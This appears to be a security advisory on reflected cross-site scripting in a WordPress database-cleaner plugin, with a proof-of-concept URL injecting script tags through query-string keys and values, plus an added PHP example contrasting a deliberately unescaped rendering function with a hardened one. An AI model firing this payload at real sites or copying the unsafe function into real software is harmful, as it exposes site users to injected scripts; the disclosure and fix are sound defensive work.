The plugin does not sanitise and escape $_GET keys and values before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues.
https://example.com/wp-admin/admin.php?page=advanced_db_cleaner&aDBc_tab=options&aDBc_cat=all&'><script>alert(/XSS-key/)</script>=<script>alert(/XSS-value/)</script>
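
The pattern described above, next to a hardened form, as an added example that is not the plugin's code. The function names and the hidden-input markup are assumptions, the input array is constructed from the query string above, and plain `htmlspecialchars()` stands in for WordPress's `esc_attr()` so the snippet runs outside WordPress.

```php
<?php
// Added example: not the plugin's code. Function names are hypothetical.

// Constructed input mirroring the query string shown above.
$params = [
    'page'     => 'advanced_db_cleaner',
    'aDBc_tab' => 'options',
    'aDBc_cat' => 'all',
    "'><script>alert(/XSS-key/)</script>" => '<script>alert(/XSS-value/)</script>',
];

// Vulnerable pattern: keys and values are written into attributes as-is,
// so a quote in either one closes the attribute and the tag.
function render_fields_unsafe(array $params): string
{
    $html = '';
    foreach ($params as $key => $value) {
        $html .= "<input type='hidden' name='$key' value='$value'>\n";
    }
    return $html;
}

// Hardened pattern: escape BOTH key and value for attribute context,
// accept only scalar values, and optionally allowlist the expected keys.
function render_fields_safe(array $params, ?array $allowed = null): string
{
    $esc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $html = '';
    foreach ($params as $key => $value) {
        $key = (string) $key; // numeric-looking keys arrive as int
        if (!is_scalar($value)) {
            continue; // e.g. ?a[]=x yields an array value: drop it
        }
        if ($allowed !== null && !in_array($key, $allowed, true)) {
            continue; // unexpected parameter name: drop it
        }
        $html .= sprintf("<input type='hidden' name='%s' value='%s'>\n",
            $esc($key), $esc((string) $value));
    }
    return $html;
}

echo "--- unescaped ---\n", render_fields_unsafe($params);
echo "--- escaped only ---\n", render_fields_safe($params);
echo "--- escaped + allowlist ---\n",
    render_fields_safe($params, ['page', 'aDBc_tab', 'aDBc_cat']);
```

Escaping only the value leaves the key path open, which is why both sides go through the same encoder; the allowlist then removes parameters the page never expects.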